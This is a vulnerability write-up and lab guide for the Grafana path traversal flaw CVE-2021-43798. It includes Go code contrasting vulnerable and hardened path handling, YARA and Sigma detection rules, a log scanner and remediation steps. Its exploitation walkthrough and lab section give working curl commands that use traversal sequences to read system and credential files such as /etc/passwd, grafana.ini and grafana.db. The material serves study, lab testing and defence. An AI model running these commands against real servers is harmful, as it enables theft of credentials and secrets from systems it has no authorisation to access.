CVE-2021-43798: Grafana Path Traversal Vulnerability
Executive Summary
CVE-2021-43798 is a critical path traversal vulnerability affecting Grafana versions 8.0.0-beta1 through 8.3.0. This vulnerability allows unauthenticated remote attackers to read arbitrary files from the Grafana server by exploiting improper input validation in plugin routes.
| Attribute | Value |
|---|---|
| CVE ID | CVE-2021-43798 |
| CVSS Score | 7.5 (HIGH) |
| Attack Vector | Network |
| Complexity | Low |
| Authentication | None Required |
| Impact | Confidentiality (High) |
Technical Deep Dive
Vulnerability Mechanism
The vulnerability exists in Grafana's plugin API endpoint. When a request is made to /public/plugins/<plugin-id>/../../../etc/passwd, Grafana fails to properly sanitize the path, allowing directory traversal sequences (../) to escape the plugin directory and access arbitrary files on the filesystem.
Affected Versions
- Grafana 8.0.0-beta1 through 8.3.0
- Fixed in versions 8.3.1, 8.2.7, 8.1.8, and 8.0.7
Root Cause
The vulnerability stems from insufficient path validation in the getPluginAssets function. The code did not properly sanitize user input before constructing file paths, allowing attackers to use path traversal sequences.
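To make the root cause concrete, here is an added illustration (not Grafana's code) of the join-without-containment pattern the text describes, next to a hardened version. The plugin directory path, `/var/lib/grafana/plugins/grafana-clock-panel`, is an assumed layout for the demo.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsidePluginDir is returned when a cleaned path leaves the plugin directory.
var ErrOutsidePluginDir = errors.New("requested asset escapes the plugin directory")

// unsafeAssetPath mirrors the vulnerable pattern: the request path is joined onto
// the plugin directory with no check that the result stays inside it.
// filepath.Join collapses ".." segments, so enough of them walk out of pluginDir.
func unsafeAssetPath(pluginDir, requested string) string {
	return filepath.Join(pluginDir, requested)
}

// safeAssetPath joins the same way, then uses filepath.Rel to confirm the cleaned
// result is still inside pluginDir. Rel is used instead of a string-prefix test so
// that a sibling directory such as "<pluginDir>-evil" is not accepted either.
func safeAssetPath(pluginDir, requested string) (string, error) {
	base := filepath.Clean(pluginDir)
	full := filepath.Join(base, requested)
	rel, err := filepath.Rel(base, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsidePluginDir
	}
	return full, nil
}

func main() {
	dir := "/var/lib/grafana/plugins/grafana-clock-panel" // assumed layout for the demo
	for _, req := range []string{"module.js", "../../../etc/passwd"} {
		fmt.Printf("request %q\n  unsafe -> %s\n", req, unsafeAssetPath(dir, req))
		if p, err := safeAssetPath(dir, req); err != nil {
			fmt.Printf("  safe   -> rejected: %v\n", err)
		} else {
			fmt.Printf("  safe   -> %s\n", p)
		}
	}
}
```

The check is purely lexical: symlinks inside the plugin directory are not resolved, so a deployment that allows untrusted plugin content needs an additional real-path check.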
Exploitation Walkthrough
Prerequisites
- Network access to Grafana instance on port 3000
- Grafana version between 8.0.0-beta1 and 8.3.0
Step 1: Identify Target
First, confirm the target is running a vulnerable Grafana version:
```bash
# The JSON response includes the running Grafana version
curl -s http://target:3000/api/health
```
Step 2: Enumerate Installed Plugins
List available plugins that can be used as the traversal entry point:
```bash
# Common default plugins
curl -s "http://target:3000/public/plugins/grafana-clock-panel/../../../etc/passwd"
curl -s "http://target:3000/public/plugins/alertlist/../../../etc/passwd"
```
Step 3: Extract Sensitive Files
Read the Grafana configuration file which often contains database credentials:
```bash
# Read grafana.ini configuration
curl -s "http://target:3000/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini"
# Read environment file
curl -s "http://target:3000/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/.env"
# Read database credentials
curl -s "http://target:3000/public/plugins/grafana-clock-panel/../../../../../../../var/lib/grafana/grafana.db"
```
Step 4: Extract Secrets
The Grafana database often contains:
- Admin credentials (hashed)
- API keys
- Data source credentials (potentially in plaintext)
- Alert notification webhooks
Lab Environment
Starting the Lab
```bash
cd labs/CVE-2021-43798
docker-compose -f docker-compose.lab.yml up -d
```
Accessing the Lab
- Grafana Target: http://localhost:3000
- Attacker Container:
```bash
docker exec -it attacker bash
```
Exploitation Commands
From the attacker container:
```bash
# Test basic file read
curl "http://target:3000/public/plugins/grafana-clock-panel/../../../etc/passwd"
# Read Grafana secrets
curl "http://target:3000/public/plugins/grafana-clock-panel/../../../etc/grafana/grafana.ini" | grep -A5 "security"
```
Detection & Monitoring
YARA Rule
```yara
rule CVE_2021_43798_Grafana_PathTraversal {
    meta:
        description = "Detects CVE-2021-43798 Grafana path traversal attempts"
        author = "ilovethreats"
        cve = "CVE-2021-43798"
    strings:
        $uri1 = "/public/plugins/" nocase
        $traversal = "../"
        $etc = "/etc/" nocase
        $grafana = "grafana" nocase
    condition:
        $uri1 and $traversal and ($etc or $grafana)
}
```
Note that `$grafana` also matches plugin ids in the request path (for example `grafana-clock-panel`), so for those plugins the condition effectively reduces to `$uri1 and $traversal`, regardless of which file is targeted.
Sigma Rule
```yaml
title: Grafana CVE-2021-43798 Path Traversal
id: a1b2c3d4-1234-5678-abcd-ef1234567890
status: stable
description: Detects exploitation attempts of CVE-2021-43798 Grafana path traversal
references:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43798
    - https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
logsource:
    category: webserver
    product: nginx
detection:
    selection:
        # both substrings must be present in the same request path
        cs-uri-stem|contains|all:
            - '/public/plugins/'
            - '../'
    condition: selection
falsepositives:
    - Legitimate plugin requests (rare)
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2021.43798
```
Network Detection
Monitor for HTTP requests matching:
- URI path containing `/public/plugins/` AND `../`
- Requests attempting to access `/etc/`, `/var/`, or `/proc/`
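The Sigma rule and the network-detection criteria above, applied to access-log lines as an added example (not part of the original lab): the log lines are constructed nginx combined-format samples, and the request target is percent-decoded before matching so an encoded `..` segment is not missed.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Constructed nginx combined-format lines for the demo; not real traffic.
var sampleLog = []string{
	`10.0.0.5 - - [08/Dec/2021:10:01:02 +0000] "GET /public/plugins/grafana-clock-panel/module.js HTTP/1.1" 200 4213 "-" "Mozilla/5.0"`,
	`198.51.100.7 - - [08/Dec/2021:10:01:09 +0000] "GET /public/plugins/grafana-clock-panel/../../../etc/passwd HTTP/1.1" 200 1873 "-" "curl/7.68.0"`,
	`198.51.100.7 - - [08/Dec/2021:10:01:15 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 200 9912 "-" "curl/7.68.0"`,
}

// Alert is one flagged request; Sensitive marks targets under /etc/, /var/ or /proc/.
type Alert struct{ Client, Path string; Sensitive bool }

// isTraversal percent-decodes the target first (so %2e%2e forms are not missed)
// and reports whether it is a plugin-route request carrying a ".." segment.
func isTraversal(raw string) (string, bool) {
	path := raw
	if dec, err := url.PathUnescape(raw); err == nil {
		path = dec
	}
	onRoute := strings.Contains(strings.ToLower(path), "/public/plugins/")
	return path, onRoute && strings.Contains(path+"/", "/../")
}

// scan reads client (field 1) and request target (field 7) of each combined-format line.
func scan(lines []string) (alerts []Alert) {
	for _, l := range lines {
		f := strings.Fields(l)
		if len(f) < 7 {
			continue
		}
		if p, hit := isTraversal(f[6]); hit {
			lp := strings.ToLower(p)
			sens := strings.Contains(lp, "/etc/") || strings.Contains(lp, "/var/") || strings.Contains(lp, "/proc/")
			alerts = append(alerts, Alert{f[0], p, sens})
		}
	}
	return alerts
}

func main() {
	for _, a := range scan(sampleLog) {
		fmt.Printf("client=%s sensitive=%v path=%s\n", a.Client, a.Sensitive, a.Path)
	}
}
```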
Remediation
Immediate Actions
- Upgrade Grafana to version 8.3.1+ (or appropriate patched version for your branch)
- Restrict network access to Grafana if public-facing
- Review access logs for exploitation attempts
Patching
```bash
# For Debian/Ubuntu
sudo apt update && sudo apt install grafana=8.3.1
# For Docker
docker pull grafana/grafana:8.3.1
```
Workarounds (if patching not immediately possible)
- Reverse proxy filtering: Block requests containing `..` in the path
- WAF rules: Deploy rules to detect path traversal attempts
- Network segmentation: Limit access to trusted networks only
Impact Assessment
What Attackers Can Access
- `/etc/passwd` - System user enumeration
- `/etc/grafana/grafana.ini` - Database credentials, secret keys
- `/var/lib/grafana/grafana.db` - SQLite database with credentials
- `/proc/self/environ` - Environment variables with secrets
- SSH keys, cloud credentials, and other sensitive files
Real-World Exploitation
This vulnerability was actively exploited in the wild within days of disclosure. Attackers used it to:
- Steal database credentials for lateral movement
- Extract API keys for cloud services
- Enumerate internal network information
This lab is provided for educational and authorized security testing purposes only.